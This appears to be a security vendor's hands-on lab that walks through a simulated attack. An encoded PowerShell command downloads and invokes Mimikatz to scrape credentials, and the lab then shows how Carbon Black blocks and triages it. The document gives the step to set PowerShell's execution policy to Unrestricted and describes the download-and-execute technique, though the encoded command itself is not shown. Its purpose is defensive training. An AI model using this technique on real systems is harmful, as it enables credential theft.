Maintain and Manipulate

Updated on

After achieving initial access attackers attempt to move forward with their goals. One of the best ways of doing that is scraping credentials or abusing other existing binaries in the environment – like PowerShell. A trusted program like PowerShell is not blocked by traditional signature-based AV. It is commonly used across Windows environments for legitimate purpose – but attackers can leverage it for malicious intent as well. 

In this attack we will leverage PowerShell to attempt to perform malicious actions. Unlike the last alert we ran, PowerShell will not have a known malware reputation. Instead, Carbon Black applies prevention by looking at the behaviors that applications exhibit as well as recognizing that PowerShell is trying to execute content that contains malware (Mimikatz). Behavioral based rules can be specified to apply prevention to even trusted tools if they are being used maliciously.  

1. Run the Attack

We will use PowerShell to attempt to run an attack leveraging Mimikatz. The command has been encoded for further obfuscation. 

2. Run PowerShell commands

  1. Run PowerShell with administrative privileges
  2. Run command Set-ExecutionPolicy Unrestricted 
  3. Run command below
Click to copy

Carbon Black applies prevention killing off the malicious PowerShell instance. PowerShell attempts to leverage Mimikatz to scrape credentials. We can recognize this malicious behavior and kill off the malicious instance while preventing the malicious actions. Note that PowerShell was allowed to run as expected until it began behaving maliciously. 

3. Investigate

We will now pivot to the Carbon Black Console to review information about the attack we just ran. If you are not currently on the Alerts page, navigate to Alerts using the left-hand menu. 

4. Review Information

  1. Navigate to the new alert (severity 8) and click the chevron to expand alert details 

5. Triage

The reputation for PowerShell is trusted whitelist – which is expected; in most cases we expect PowerShell to run normally without prevention as it is used in many everyday IT activities. The power of Carbon Black is to define the behaviors that we want to prevent while allowing PowerShell to run when it should 

6. Refresh Console for any issues

If you do not see your alert appearing, refresh the console URL page and check again. The console URL, NOT the horizon URL.

7. Alert Triage

  1. Click the tree icon to go to the alert triage 

8. PowerShell.exe node

  1. Click the first PowerShell.exe node 

In this attack PowerShell attempted to run encoded commands. Carbon Black automatically decodes encoded PowerShell scripts – easing time to remediation and enhancing investigative ability. 

9. Command Link

  1. Click the CMD link in the process details pane on the right-hand side of the screen 

10. Command Line

We can now see the formatted PowerShell script. In this case PowerShell downloads and attempts to invoke Mimikatz before being prevented by Carbon Black. The malicious actor would attempt to use Mimikatz to grab credentials for further attack actions.

11. Review Prevention

  1. Click the 'X' to close out of the CMD Line screen
  2. Click the second PowerShell.exe node

Note the red shield icon indicating that Carbon Black applied prevention. Additional process details including behaviors exhibited by the specific instance of PowerShell can be viewed on the right.